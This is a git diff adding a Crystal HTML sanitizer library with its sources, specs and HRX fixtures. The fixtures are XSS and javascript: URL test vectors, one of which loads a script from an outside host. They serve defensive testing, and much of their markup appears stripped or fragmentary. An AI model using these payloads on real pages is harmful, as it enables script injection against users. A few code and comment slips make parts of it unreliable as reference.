UTF-8 encoding/common.html +foo +<===> long UTF-8 encoding/restricted.html +foo +<===> long UTF-8 encoding/basic.html +foo +<===> long UTF-8 encoding/relaxed.html +foo + +<===> long UTF-8 encoding without semicolons/fragment.html +foo +<===> long UTF-8 encoding without semicolons/common.html +foo +<===> long UTF-8 encoding without semicolons/restricted.html +foo +<===> long UTF-8 encoding without semicolons/basic.html +foo +<===> long UTF-8 encoding without semicolons/relaxed.html +foo + +<===> hex encoding/fragment.html +foo +<===> hex encoding/common.html +foo +<===> hex encoding/restricted.html +foo +<===> hex encoding/basic.html +foo +<===> hex encoding/relaxed.html +foo + +<===> long hex encoding/fragment.html +foo +<===> long hex encoding/common.html +foo +<===> long hex encoding/restricted.html +foo +<===> long hex encoding/basic.html +foo +<===> long hex encoding/relaxed.html +foo + +<===> hex encoding without semicolons/fragment.html +foo +<===> hex encoding without semicolons/common.html +foo +<===> hex encoding without semicolons/restricted.html +foo +<===> hex encoding without semicolons/basic.html +foo +<===> hex encoding without semicolons/relaxed.html +foo + +<===> null char/fragment.html + +<===> null char/common.html +<===> null char/restricted.html +<===> null char/basic.html +<===> null char/relaxed.html +<===> invalid URL char/fragment.html + +<===> invalid URL char/common.html + +<===> invalid URL char/restricted.html + +<===> invalid URL char/basic.html + +<===> invalid URL char/relaxed.html + + +<===> spaces and entities/fragment.html + +<===> spaces and entities/common.html + +<===> spaces and entities/restricted.html + +<===> spaces and entities/basic.html + +<===> spaces and entities/relaxed.html + + +<===> protocol whitespace/fragment.html 
+ +<===> protocol whitespace/common.html + +<===> protocol whitespace/restricted.html + +<===> protocol whitespace/basic.html + +<===> protocol whitespace/relaxed.html + diff --git a/spec/html_sanitizer/protocol_javascript.hrx b/spec/html_sanitizer/protocol_javascript.hrx new file mode 100644 index 0000000..fc4b86c --- /dev/null +++ b/spec/html_sanitizer/protocol_javascript.hrx @@ -0,0 +1,67 @@ +<===> simple, no spaces/fragment.html +foo +<===> simple, no spaces/common.html +foo +<===> simple, spaces before/fragment.html +foo +<===> +# TODO: Maybe this should strip the a tag +<===> simple, spaces before/common.html +foo +<===> simple, spaces after/fragment.html +foo +<===> simple, spaces after/common.html +foo +<===> simple, spaces before and after/fragment.html +foo +<===> +# TODO: Maybe this should strip the a tag +<===> simple, spaces before and after/common.html +foo +<===> preceding colon/fragment.html +foo +<===> +# TODO: Maybe this should strip the a tag +<===> preceding colon/common.html +foo +<===> UTF-8 encoding/fragment.html +foo +<===> UTF-8 encoding/common.html +foo +<===> long UTF-8 encoding/fragment.html +foo +<===> long UTF-8 encoding/common.html +foo +<===> long UTF-8 encoding without semicolons/fragment.html +foo +<===> long UTF-8 encoding without semicolons/common.html +foo +<===> hex encoding/fragment.html +foo +<===> hex encoding/common.html +foo +<===> long hex encoding/fragment.html +foo +<===> long hex encoding/common.html +foo +<===> hex encoding without semicolons/fragment.html +foo +<===> hex encoding without semicolons/common.html +foo +<===> null char/fragment.html + +<===> +# TODO: Maybe this should strip the a tag +<===> null char/common.html + +<===> invalid URL char/fragment.html + +<===> +# TODO: Maybe this should strip the a tag +<===> invalid URL char/common.html + +<===> spaces and entities/fragment.html + +<===> spaces and entities/common.html + +<===> diff --git a/spec/html_sanitizer/url_spec.cr b/spec/html_sanitizer/url_spec.cr new file mode 100644 index 0000000..5e1aade --- /dev/null +++ b/spec/html_sanitizer/url_spec.cr @@ -0,0 +1,8 @@ +require "../support/hrx" +require "../../src/policy/html_sanitizer" + +describe "Sanitize::Policy::HTMLSanitizer" do + it "escapes URL attribute" do + Sanitize::Policy::HTMLSanitizer.common.process(%()).should eq %() + end +end diff --git a/spec/html_sanitizer/xss.hrx b/spec/html_sanitizer/xss.hrx new file mode 100644 index 0000000..d573491 --- /dev/null +++ b/spec/html_sanitizer/xss.hrx @@ -0,0 +1,475 @@ +<===> # Basic XSS +<===> fragment.html +test +<===> common.html +test +<===> + + +<===> fragment.html +<<<>< +<===> common.html + +<===> + + +<===> fragment.html + +<===> +` +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html +
+<===> + + +<===> fragment.html +
+<===> common.html +
+<===> + + +<===> fragment.html +
+<===> common.html +
+<===> + + +<===> fragment.html +
+<===> common.html +
+<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html + +<===> + +<===> common.html + +<===> + + +<===> fragment.html + +<===> common.html + +<===> + + +<===> fragment.html +PT SRC="http://ha.ckers.org/xss.js"> +<===> common.html +PT SRC="http://ha.ckers.org/xss.js"> +<===> + + +<===> fragment.html + +<==> complex/text.html +Lorem ipsum dolor sit amet +<==> + + +<==> html-special-chars/fragment.html +<script> +<==> html-special-chars/text.html +<script> +<==> + + +<==> prune script/fragment.html + +<==> prune script/text.html +<==> + + +<==> prune style/fragment.html + +<==> prune script/text.html +<==> diff --git a/spec/text_policy_spec.cr b/spec/text_policy_spec.cr new file mode 100644 index 0000000..8b02a15 --- /dev/null +++ b/spec/text_policy_spec.cr @@ -0,0 +1,17 @@ +require "./support/hrx" +require "../src/policy/text" +require "../src/processor" + +describe Sanitize::Policy::Text do + it "continues on tag" do + Sanitize::Policy::Text.new.transform_tag("foo", {} of String => String).should eq Sanitize::Policy::CONTINUE + end + + it "adds whitespace" do + Sanitize::Policy::Text.new.process("foo
bar").should eq "foo bar" + end + + run_hrx_samples Path["./text_policy.hrx"], { + "text" => Sanitize::Policy::Text.new, + } +end diff --git a/spec/uri_sanitizer_spec.cr b/spec/uri_sanitizer_spec.cr new file mode 100644 index 0000000..34161cc --- /dev/null +++ b/spec/uri_sanitizer_spec.cr @@ -0,0 +1,113 @@ +require "../src/uri_sanitizer" +require "spec" +require "uri" + +private def assert_sanitize(source : String, expected : String? = source, sanitizer = Sanitize::URISanitizer.new) + if expected + expected = URI.parse(expected) + end + sanitizer.sanitize(URI.parse(source)).should eq expected +end + +describe Sanitize::URISanitizer do + describe "#accepted_schemes" do + it "has default value" do + Sanitize::URISanitizer.new.accepted_schemes.should eq Set{"http", "https", "mailto", "tel"} + end + + it "accepts minimal schemes" do + assert_sanitize("http://example.com") + assert_sanitize("https://example.com") + assert_sanitize("mailto:mail@example.com") + assert_sanitize("tel:example.com") + end + + it "refutes unsafe schemes" do + assert_sanitize("javascript:alert();", nil) + assert_sanitize("ssh:git@github.com", nil) + end + + it "custom schemes" do + sanitizer = Sanitize::URISanitizer.new + sanitizer.accept_scheme "javascript" + assert_sanitize("javascript:alert();", sanitizer: sanitizer) + end + + it "can be disabled" do + sanitizer = Sanitize::URISanitizer.new + sanitizer.accepted_schemes = nil + assert_sanitize("javascript:alert();", sanitizer: sanitizer) + assert_sanitize("foo:bar", sanitizer: sanitizer) + end + end + + describe "#base_url" do + it "disabled by default" do + Sanitize::URISanitizer.new.base_url.should be_nil + assert_sanitize("foo") + end + + it "set to absolute URL" do + sanitizer = Sanitize::URISanitizer.new + sanitizer.base_url = URI.parse("https://example.com/base/") + + assert_sanitize("foo", "https://example.com/base/foo", sanitizer: sanitizer) + assert_sanitize("/foo", "https://example.com/foo", sanitizer: sanitizer) + end + end + + describe "#accepted_hosts" do + it "disabled by default" do + Sanitize::URISanitizer.new.accepted_hosts.should be_nil + end + + it "restricts hosts" do + sanitizer = Sanitize::URISanitizer.new + sanitizer.accepted_hosts = Set{"foo.example.com"} + assert_sanitize("http://foo.example.com", sanitizer: sanitizer) + assert_sanitize("http://bar.example.com", nil, sanitizer: sanitizer) + assert_sanitize("http://example.com", nil, sanitizer: sanitizer) + assert_sanitize("http://foo.foo.example.com", nil, sanitizer: sanitizer) + assert_sanitize("foo", sanitizer: sanitizer) + end + + it "works with base_url" do + sanitizer = Sanitize::URISanitizer.new + sanitizer.accepted_hosts = Set{"foo.example.com"} + sanitizer.base_url = URI.parse("http://bar.example.com/") + assert_sanitize("foo", "http://bar.example.com/foo", sanitizer: sanitizer) + assert_sanitize("http://bar.example.com/foo", nil, sanitizer: sanitizer) + end + end + + describe "#rejected_hosts" do + it "disabled by default" do + Sanitize::URISanitizer.new.rejected_hosts.should be_a(Set(String)) + end + + it "restricts hosts" do + sanitizer = Sanitize::URISanitizer.new + sanitizer.rejected_hosts = Set{"bar.example.com"} + assert_sanitize("http://foo.example.com", sanitizer: sanitizer) + assert_sanitize("http://bar.example.com", nil, sanitizer: sanitizer) + assert_sanitize("http://example.com", sanitizer: sanitizer) + assert_sanitize("http://bar.bar.example.com", sanitizer: sanitizer) + assert_sanitize("foo", sanitizer: sanitizer) + end + + it "works with base_url" do + sanitizer = 
Sanitize::URISanitizer.new + sanitizer.rejected_hosts = Set{"foo.example.com"} + sanitizer.base_url = URI.parse("http://foo.example.com/") + assert_sanitize("foo", "http://foo.example.com/foo", sanitizer: sanitizer) + assert_sanitize("http://foo.example.com/foo", nil, sanitizer: sanitizer) + end + + it "overrides accepted_hosts" do + sanitizer = Sanitize::URISanitizer.new + sanitizer.rejected_hosts = Set{"foo.example.com"} + sanitizer.accepted_hosts = Set{"foo.example.com"} + assert_sanitize("http://foo.example.com/foo", nil, sanitizer: sanitizer) + end + end +end diff --git a/src/adapter/libxml2.cr b/src/adapter/libxml2.cr new file mode 100644 index 0000000..51d8994 --- /dev/null +++ b/src/adapter/libxml2.cr @@ -0,0 +1,137 @@ +struct Sanitize::Adapter::LibXML2 + include Adapter + + def self.process(policy : Policy, html : String, fragment : Bool = false) + return "" if html.empty? + + node = parse(html, fragment) + process(policy, node, fragment) + end + + def self.process(policy : Policy, node : XML::Node, fragment : Bool = false) + build(fragment) do |builder| + process(policy, node, builder, fragment) + end + end + + def self.process(policy : Policy, node : XML::Node, builder : XML::Builder, fragment : Bool = false) + processor = Processor.new(policy, new(builder)) + visit(processor, node, fragment) + builder.end_document + builder.flush + end + + def self.parse(html : String, fragment : Bool) + if fragment + html = "#{html}" + end + + node = XML.parse_html(html, XML::HTMLParserOptions.default | XML::HTMLParserOptions::NOIMPLIED | XML::HTMLParserOptions::NODEFDTD) + end + + def self.build(fragment : Bool) + result = String.build do |io| + builder = XML::Builder.new(io) + + if fragment + builder.start_element("fragment") + end + + yield(builder) + end + + if fragment + result = "" if result == "\n" + result = result.lchop("").rchop("\n") + end + # strip trailing non-linebreak whitespace + if result.ends_with?("\n") + result + else + result.rstrip + end + end + + def self.visit(processor : Processor, node : XML::Node, fragment : Bool) + visitor = Visitor.new(processor, fragment) + visitor.visit(node) + end + + # :nodoc: + struct Visitor + @attributes = Hash(String, String).new + + def initialize(@processor : Processor, @fragment : Bool) + end + + # :nodoc: + def visit(node : XML::Node) + case node.type + when .html_document_node? + visit_children(node) + when .dtd_node? + # skip DTD + when .text_node? + visit_text(node) + when .element_node? + visit_element(node) + when .comment_node? + # skip comments + when .cdata_section_node? 
+ # skip CDATA + else + raise "Not implemented for: #{node.type}:#{node.name}:#{node.content}" + end + end + + def visit_children(node) + node.children.each do |child| + visit(child) + end + end + + def visit_text(node) + @processor.process_text(node.content) + end + + def visit_element(node) + if @fragment && node.name.in?({"html", "body"}) + @attributes.clear + @processor.process_element(node.name, @attributes, Processor::CONTINUE) do + visit_children(node) + end + return + end + + @attributes.clear + node.attributes.each do |attribute| + @attributes[attribute.name] = attribute.content + end + + name = node.name + if namespace = node.namespace + name = "#{namespace}:#{name}" + end + + @processor.process_element(name, @attributes) do + visit_children(node) + end + end + end + + def initialize(@builder : XML::Builder) + end + + def start_tag(name : String, attributes : Hash(String, String)) : Nil + @builder.start_element(name) + @builder.attributes(attributes) + end + + def end_tag(name : String, attributes : Hash(String, String)) : Nil + @builder.end_element + end + + def write_text(text : String) : Nil + @builder.text(text) + end +end diff --git a/src/policy.cr b/src/policy.cr new file mode 100644 index 0000000..d1ce31c --- /dev/null +++ b/src/policy.cr @@ -0,0 +1,45 @@ +# A policy defines the rules for transforming an HTML/XML tree. +# +# * `HTMLSanitizer` is a policy for HTML sanitization. +# * `Whitelist` is a whitelist-based transformer that's useful either for +# simple stripping applications or as a building block for more advanced +# sanitization policies. +# * `Text` is a policy that turns HTML into plain text. +abstract class Sanitize::Policy + # :nodoc: + alias CONTINUE = Processor::CONTINUE + # :nodoc: + alias STOP = Processor::STOP + + # Defines the string that is added when whitespace is needed when a block tag + # is stripped. + property block_whitespace = " " + + # Receives the content of a text node and returns the transformed content. + # + # If the return value is `nil`, the content is skipped. + abstract def transform_text(text : String) : String? + + # Receives the element name and attributes of an opening tag and returns the + # transformed element name (usually the same as the input name). + # + # *attributes* are transformed directly in place. + # + # Special return values: + # * `Processor::CONTINUE`: Tells the processor to strip the current tag but + # continue traversing its children. + # * `Processor::CONTINUE`: Tells the processor to skip the current tag and its + # children completely and move to the next sibling. + abstract def transform_tag(name : String, attributes : Hash(String, String)) : String | Processor::CONTINUE | Processor::STOP + + HTML_BLOCK_ELEMENTS = Set{ + "address", "article", "aside", "audio", "video", "blockquote", "br", + "canvas", "dd", "div", "dl", "fieldset", "figcaption", "figure", "footer", + "form", "h1", "h2", "h3", "h4", "h5", "h6", "header", "hgroup", "hr", + "noscript", "ol", "output", "p", "pre", "section", "table", "tfoot", "ul", + } + + def block_tag?(name) + HTML_BLOCK_ELEMENTS.includes?(name) + end +end diff --git a/src/policy/html_sanitizer.cr b/src/policy/html_sanitizer.cr new file mode 100644 index 0000000..f751bfd --- /dev/null +++ b/src/policy/html_sanitizer.cr @@ -0,0 +1,348 @@ +require "./whitelist" +require "../uri_sanitizer" + +# This policy serves as a good default configuration that should fit most +# typical use cases for HTML sanitization. 
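+#
+# A minimal end-to-end sketch (the class pattern and base URL below are example
+# values, not defaults; each option is described in the sections that follow):
+#
+# ```
+# require "sanitize"
+#
+# sanitizer = Sanitize::Policy::HTMLSanitizer.common
+# # Accept `class` values used by a syntax highlighter (example prefix).
+# sanitizer.valid_classes << /language-.+/
+# # Resolve relative URLs in `href`/`src` against a base URL.
+# sanitizer.uri_sanitizer.base_url = URI.parse("https://example.com/")
+#
+# safe_html = sanitizer.process(%(<p class="language-crystal">puts 1</p>))
+# ```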
+# +# ## Configurations +# It comes in three different configurations with different sets of supported +# HTML tags. +# +# They only differ in the default configuration of allowed tags and attributes. +# The transformation behaviour is otherwise the same. +# +# ### Common Configuration +# `.common`: Accepts most standard tags and thus allows using a good +# amount of HTML features (see `COMMON_SAFELIST`). +# +# This is the recommended default configuration and should work for typical use +# cases unless strong restrictions on allowed content is required. +# +# ``` +# sanitizer = Sanitize::Policy::HTMLSanitizer.common +# sanitizer.process(%(foo)) # => %(foo) +# sanitizer.process(%(

foo

)) # => %(

foo

) +# sanitizer.process(%()) # => %() +# sanitizer.process(%(
foobar
)) # => %(
foobar
)
+# ```
+#
+# NOTE: Neither this configuration nor any other accepts `<html>`,
+# `<head>`, or `<body>` tags by default. In order to use
+# `#process_document` they need to be accepted explicitly (for example via `#accept_tag`).
+#
+# ### Basic Configuration
+#
+# `.basic`: This set accepts some basic tags including paragraphs, headlines,
+# lists, and images (see `BASIC_SAFELIST`).
+#
+# ```
+# sanitizer = Sanitize::Policy::HTMLSanitizer.basic
+# sanitizer.process(%(foo)) # => %(foo)
+# sanitizer.process(%(

foo

)) # => %(

foo

) +# sanitizer.process(%()) # => %() +# sanitizer.process(%(
foobar
)) # => %(foo bar) +# ``` +# +# ### Inline Configuration +# +# `.inline`: Accepts only a limited set of inline tags (see `INLINE_SAFELIST`). +# +# ``` +# sanitizer = Sanitize::Policy::HTMLSanitizer.inline +# sanitizer.process(%(foo)) # => %(foo) +# sanitizer.process(%(

foo

)) # => %(foo) +# sanitizer.process(%()) # => %() +# sanitizer.process(%(
foobar
)) # => %(foo bar)
+# ```
+#
+# ## Attribute Transformations
+#
+# Attribute transformations are identical in all three configurations. But more
+# advanced transforms won't apply if the respective attribute is not allowed in
+# `accepted_attributes`.
+# So you can easily add additional elements and attributes to lower-tier sets
+# and get the same attribute validation. For example: `.inline` doesn't include
+# `<img>` tags, but when `img` is added to `accepted_attributes`,
+# the policy validates `<img>` tags the same way as in `.common`.
+#
+# ### URL Sanitization
+#
+# This transformation applies to attributes that contain a URL (configurable
+# through `url_attributes`).
+#
+# * Makes sure the value is a valid URI (via `URI.parse`). If it does not parse,
+# the attribute value is set to an empty string.
+# * Sanitizes the URI via `URISanitizer` (configurable through `uri_sanitizer`).
+# If the sanitizer returns `nil`, the attribute value is set to an empty string.
+#
+# The same `URISanitizer` is used for all URL attributes.
+#
+# ### Anchor Tags
+#
+# For `<a>` tags with an `href` attribute, there are two transforms:
+#
+# * `rel="nofollow"` is added (can be disabled with `add_rel_nofollow`).
+# * `rel="noopener"` is added to links with a `target` attribute (can be disabled
+# with `add_rel_noopener`).
+#
+# Anchor tags that have neither an `href`, `name`, nor `id` attribute are stripped.
+#
+# NOTE: `name` and `id` attributes are not in any of the default sets of
+# accepted attributes, so they can only be used when explicitly enabled.
+#
+# ### Image Tags
+#
+# `<img>` tags are stripped if they don't have a `src` attribute.
+#
+# ### Size Attributes
+#
+# If a tag has `width` or `height` attributes, the values are validated to be
+# numerical or percent values.
+# By default, these attributes are only accepted for `<img>` tags.
+#
+# ### Alignment Attribute
+#
+# The `align` attribute is validated against allowed values for this attribute:
+# `center, left, right, justify, char`.
+# If the value is invalid, the attribute is stripped.
+#
+# ### Classes
+#
+# `class` attributes are filtered to accept only classes described by
+# `valid_classes`. String values need to match the class name exactly, regex
+# values need to match the entire class name.
+#
+# `class` is accepted as a global attribute in the default configuration, but no
+# values are allowed in `valid_classes`.
+#
+# All classes can be accepted by adding the match-all regular expression `/.*/`
+# to `valid_classes`.
+class Sanitize::Policy::HTMLSanitizer < Sanitize::Policy::Whitelist
+  # Add `rel="nofollow"` to every `<a>` tag with an `href` attribute.
+  property add_rel_nofollow = true
+
+  # Add `rel="noopener"` to every `<a>` tag with `href` and `target` attributes.
+  property add_rel_noopener = true
+
+  # Configures the `URISanitizer` to use for sanitizing URL attributes.
+  property uri_sanitizer = URISanitizer.new
+
+  # Configures which attributes are considered to contain URLs. If empty, URL
+  # sanitization is disabled.
+  #
+  # Default value: `Set{"src", "href", "action", "cite", "longdesc"}`.
+  property url_attributes : Set(String) = Set{"src", "href", "action", "cite", "longdesc"}
+
+  # Configures which classes are valid for `class` attributes.
+  #
+  # String values need to match the class name exactly, regex
+  # values need to match the entire class name.
+ # + # Default value: empty + property valid_classes : Set(String | Regex) = Set(String | Regex).new + + def valid_classes=(classes) + valid_classes = classes.map(&.as(String | Regex)).to_set + end + + # Creates an instance which accepts a limited set of inline tags (see + # `INLINE_SAFELIST`). + def self.inline : HTMLSanitizer + new( + accepted_attributes: INLINE_SAFELIST.clone + ) + end + + # Creates an instance which accepts more basic tags including paragraphs, + # headlines, lists, and images (see `BASIC_SAFELIST`). + def self.basic : HTMLSanitizer + new( + accepted_attributes: BASIC_SAFELIST.clone + ) + end + + # Creates an instance which accepts even more standard tags and thus allows + # using a good amount of HTML features (see `COMMON_SAFELIST`). + # + # Unless you need tight restrictions on allowed content, this is the + # recommended default. + def self.common : HTMLSanitizer + new( + accepted_attributes: COMMON_SAFELIST.clone + ) + end + + # Removes anchor tag (`<a>` from the list of accepted tags). + # + # NOTE: This doesn't reject attributes with URL values for other tags. + def no_links + accepted_attributes.delete("a") + + self + end + + def accept_tag(tag : String, attributes : Set(String) = Set(String).new) + accepted_attributes[tag] = attributes + end + + def transform_attributes(tag : String, attributes : Hash(String, String)) : String | CONTINUE | STOP + transform_url_attributes(tag, attributes) + + tag_result = case tag + when "a" + transform_tag_a(attributes) + when "img" + transform_tag_img(attributes) + end + + if tag_result + return tag_result + end + + limit_numeric_or_percent(attributes, "width") + limit_numeric_or_percent(attributes, "height") + limit_enum(attributes, "align", ["center", "left", "right", "justify", "char"]) + + transform_classes(tag, attributes) + + tag + end + + def transform_tag_img(attributes) + unless attributes.has_key?("src") + return CONTINUE + end + end + + def transform_tag_a(attributes) + if href = attributes["href"]? + if add_rel_nofollow + append_attribute(attributes, "rel", "nofollow") + end + if add_rel_noopener && attributes.has_key?("target") + append_attribute(attributes, "rel", "noopener") + end + end + if !(((href = attributes["href"]?) && !href.empty?) || attributes.has_key?("id") || attributes.has_key?("tag")) + return CONTINUE + end + end + + def transform_url_attributes(tag, attributes) + all_ok = true + url_attributes.each do |key| + if value = attributes[key]? + all_ok &&= transform_url_attribute(tag, attributes, key, value) + end + end + all_ok + end + + def transform_url_attribute(tag, attributes, attribute, value) + begin + uri = URI.parse(value.strip) + rescue URI::Error + attributes[attribute] = "" + return false + end + + uri = transform_uri(tag, attributes, attribute, uri) + if uri.nil? || (uri.blank? || uri == "#") + attributes[attribute] = "" + return false + end + + attributes[attribute] = uri + true + end + + def transform_uri(tag, attributes, attribute, uri : URI) : String? + if uri_sanitizer = self.uri_sanitizer + uri = uri_sanitizer.sanitize(uri) + + return unless uri + end + + # Make sure special characters are properly encoded to avoid interpretation + # of tweaked relative paths as "javascript:" URI (for example) + if path = uri.path + uri.path = URI.encode(URI.decode(path)) + end + + uri.to_s + end + + def transform_classes(tag, attributes) + attribute = attributes["class"]? 
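+    # No `class` attribute present: nothing to filter.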
+ return unless attribute + + classes = attribute.split + classes = classes.select { |klass| valid_class?(tag, klass, valid_classes) } + if classes.empty? + attributes.delete("class") + else + attributes["class"] = classes.join(" ") + end + end + + private def limit_numeric_or_percent(attributes, attribute) + if value = attributes[attribute]? + value = value.strip + if value.ends_with?("%") + value = value.byte_slice(0, value.size - 1) + end + value.each_char do |char| + unless char.ascii_number? + attributes.delete(attribute) + break + end + end + end + end + + private def limit_enum(attributes, attribute, list) + if value = attributes[attribute]? + value = value.strip + if valid_with_list?(value, list) + attributes[attribute] = value + else + attributes.delete(attribute) + end + end + end + + def valid_class?(tag, klass, valid_classes) + valid_with_list?(klass, valid_classes) + end + + private def valid_with_list?(value, list) + list.any? { |validator| + case validator + when String + validator == value + when Regex + data = validator.match(value) + next unless data + data.byte_begin == 0 && data.byte_end == value.bytesize + end + } + end + + def append_attribute(attributes, attribute, value) + if curr_value = attributes[attribute]? + values = curr_value.split + if values.includes?(value) + return false + else + values << value + attributes[attribute] = values.join(" ") + end + else + attributes[attribute] = value + end + + true + end +end + +require "./html_sanitizer/safelist" diff --git a/src/policy/html_sanitizer/safelist.cr b/src/policy/html_sanitizer/safelist.cr new file mode 100644 index 0000000..2d5a7ed --- /dev/null +++ b/src/policy/html_sanitizer/safelist.cr @@ -0,0 +1,70 @@ +class Sanitize::Policy::HTMLSanitizer < Sanitize::Policy::Whitelist + # Only limited elements for inline text markup. + INLINE_SAFELIST = { + "a" => Set{"href", "hreflang"}, + "abbr" => Set(String).new, + "acronym" => Set(String).new, + "b" => Set(String).new, + "code" => Set(String).new, + "em" => Set(String).new, + "i" => Set(String).new, + "strong" => Set(String).new, + "*" => Set{ + "dir", + "lang", + "title", + "class", + }, + } + + # Compatible with basic Markdown features. + BASIC_SAFELIST = INLINE_SAFELIST.merge({ + "blockquote" => Set{"cite"}, + "br" => Set(String).new, + "h1" => Set(String).new, + "h2" => Set(String).new, + "h3" => Set(String).new, + "h4" => Set(String).new, + "h5" => Set(String).new, + "h6" => Set(String).new, + "hr" => Set(String).new, + "img" => Set{"alt", "src", "longdesc", "width", "height", "align"}, + "li" => Set(String).new, + "ol" => Set{"start"}, + "p" => Set{"align"}, + "pre" => Set(String).new, + "ul" => Set(String).new, + }) + + # Accepts most standard tags and thus allows using a good amount of HTML features. 
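+  #
+  # `HTMLSanitizer.common` builds its policy from a clone of this safelist, so
+  # constructing one directly is equivalent:
+  #
+  # ```
+  # sanitizer = Sanitize::Policy::HTMLSanitizer.new(COMMON_SAFELIST.clone)
+  # ```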
+ COMMON_SAFELIST = BASIC_SAFELIST.merge({ + "dd" => Set(String).new, + "del" => Set{"cite"}, + "details" => Set(String).new, + "dl" => Set(String).new, + "dt" => Set(String).new, + "div" => Set(String).new, + "ins" => Set{"cite"}, + "kbd" => Set(String).new, + "q" => Set{"cite"}, + "ruby" => Set(String).new, + "rp" => Set(String).new, + "rt" => Set(String).new, + "s" => Set(String).new, + "samp" => Set(String).new, + "strike" => Set(String).new, + "sub" => Set(String).new, + "summary" => Set(String).new, + "sup" => Set(String).new, + "table" => Set(String).new, + "time" => Set{"datetime"}, + "tbody" => Set(String).new, + "td" => Set(String).new, + "tfoot" => Set(String).new, + "th" => Set(String).new, + "thead" => Set(String).new, + "tr" => Set(String).new, + "tt" => Set(String).new, + "var" => Set(String).new, + }) +end diff --git a/src/policy/text.cr b/src/policy/text.cr new file mode 100644 index 0000000..82a2e67 --- /dev/null +++ b/src/policy/text.cr @@ -0,0 +1,23 @@ +require "../policy" + +# Reduces an HTML tree to the content of its text nodes. +# It renders a plain text result, similar to copying HTML content rendered by +# a browser to a text editor. +# HTML special characters are escaped. +# +# ``` +# policy = Sanitize::Policy::Text.new +# policy.process(%(foo bar!)) # => "foo bar!" +# policy.process(%(
+#   <p>foo</p><p>bar</p>
+# )) # => "foo bar"
+# policy.block_whitespace = "\n"
+# policy.process(%(
+#   <p>foo</p><p>bar</p>
)) # => "foo\nbar" +# ``` +class Sanitize::Policy::Text < Sanitize::Policy + def transform_text(text : String) : String? + text + end + + def transform_tag(name : String, attributes : Hash(String, String)) : String | CONTINUE | STOP + CONTINUE + end +end diff --git a/src/policy/whitelist.cr b/src/policy/whitelist.cr new file mode 100644 index 0000000..6dc3c45 --- /dev/null +++ b/src/policy/whitelist.cr @@ -0,0 +1,57 @@ +require "../policy" + +# This is a simple policy based on a tag and attribute whitelist. +# +# This policy accepts only `<div>` and `<p>` tags with optional `title` attributes: +# ``` +# policy = Sanitize::Policy::Whitelist.new({ +# "div" => Set{"title"}, +# "p" => Set{"title"}, +# }) +# ``` +# +# The special `*` key applies to *all* tag names and can be used to allow global +# attributes: +# +# This example is equivalent to the above. If more tag names were added, they +# would also accept `title` attributes. +# ``` +# policy = Sanitize::Policy::Whitelist.new({ +# "div" => Set(String).new, +# "p" => Set(String).new, +# "*" => Set{"title"}, +# }) +# ``` +# +# Attributes are always optional, so this policy won't enforce the presence of +# an attribute. +# +# If a tag's attribute list is empty, no attributes are allowed for this tag. +# +# Attribute values are not changed by this policy. +class Sanitize::Policy::Whitelist < Sanitize::Policy + # Mapping of accepted tag names and attributes. + property accepted_attributes : Hash(String, Set(String)) + + # Short cut to `accepted_attributes["*"]`. + getter global_attributes : Set(String) { accepted_attributes.fetch("*") { Set(String).new } } + + def initialize(@accepted_attributes : Hash(String, Set(String))) + end + + def transform_text(text : String) : String? + text + end + + def transform_tag(name : String, attributes : Hash(String, String)) : String | CONTINUE | STOP + acceptable_attributes = accepted_attributes.fetch(name) { return CONTINUE } + + attributes.delete_if { |attr, _| !acceptable_attributes.includes?(attr) && !global_attributes.includes?(attr) } + + transform_attributes(name, attributes) + end + + def transform_attributes(name : String, attributes : Hash(String, String)) : String | CONTINUE | STOP + name + end +end diff --git a/src/processor.cr b/src/processor.cr new file mode 100644 index 0000000..6d4e4ac --- /dev/null +++ b/src/processor.cr @@ -0,0 +1,110 @@ +require "xml" +require "log" +require "./adapter/libxml2" + +module Sanitize + abstract class Policy + # Processes the HTML fragment *html* with this policy using the default + # adapter (`Adapter::LibXML2`). + def process(html : String | XML::Node) : String + Adapter::LibXML2.process(self, html, fragment: true) + end + + # Processes the HTML document *html* with this policy using the default + # adapter (`Adapter::LibXML2`). + def process_document(html : String | XML::Node) : String + Adapter::LibXML2.process(self, html, fragment: false) + end + end + + module Adapter + abstract def write_text(text : String) : Nil + abstract def start_tag(name : String, attributes : Hash(String, String)) : Nil + abstract def end_tag(name : String, attributes : Hash(String, String)) : Nil + end + + # A processor traverses the HTML/XML tree, applies transformations through the + # policy and passes the result to the adapter which then builds the result. + class Processor + Log = ::Log.for(self) + + # This module serves as a singleton constant that signals the processor to + # skip the current tag but continue to traverse its children. 
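+    #
+    # For example, a policy that returns `CONTINUE` for a `<span>` tag reduces
+    # `<span>foo</span>` to `foo` in the output, while its children are still
+    # processed.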
+ module CONTINUE + extend self + end + + # This module serves as a singleton constant that signals the processor to + # skip the current tag and its children. + module STOP + extend self + end + + @last_text_ended_with_whitespace = true + @stripped_block_tag = false + + def initialize(@policy : Policy, @adapter : Adapter) + end + + def process_text(text : String) + text = @policy.transform_text(text) + + if @stripped_block_tag && !@last_text_ended_with_whitespace && !text.try(&.[0].whitespace?) + @adapter.write_text(@policy.block_whitespace) + end + + @stripped_block_tag = false + + if text + @adapter.write_text(text) + @last_text_ended_with_whitespace = text.[-1].whitespace? + else + @last_text_ended_with_whitespace = false + end + end + + def process_element(name : String, attributes : Hash(String, String), &) + process_element(name, attributes, @policy.transform_tag(name, attributes)) do + yield + end + end + + def process_element(orig_name : String, attributes : Hash(String, String), name, &) + case name + when STOP + Log.debug { "#{@policy.class} stopping at tag #{orig_name} #{attributes}" } + if @policy.block_tag?(orig_name) + @stripped_block_tag = true + end + return + when CONTINUE + Log.debug { "#{@policy.class} stripping tag #{orig_name} #{attributes}" } + if @policy.block_tag?(orig_name) + @stripped_block_tag = true + end + when String + @stripped_block_tag = false + @adapter.start_tag(name, attributes) + end + + yield + + case name + when CONTINUE + if @policy.block_tag?(orig_name) + @stripped_block_tag = true + end + when String + @stripped_block_tag = false + @adapter.end_tag(name, attributes) + end + end + + def reset + 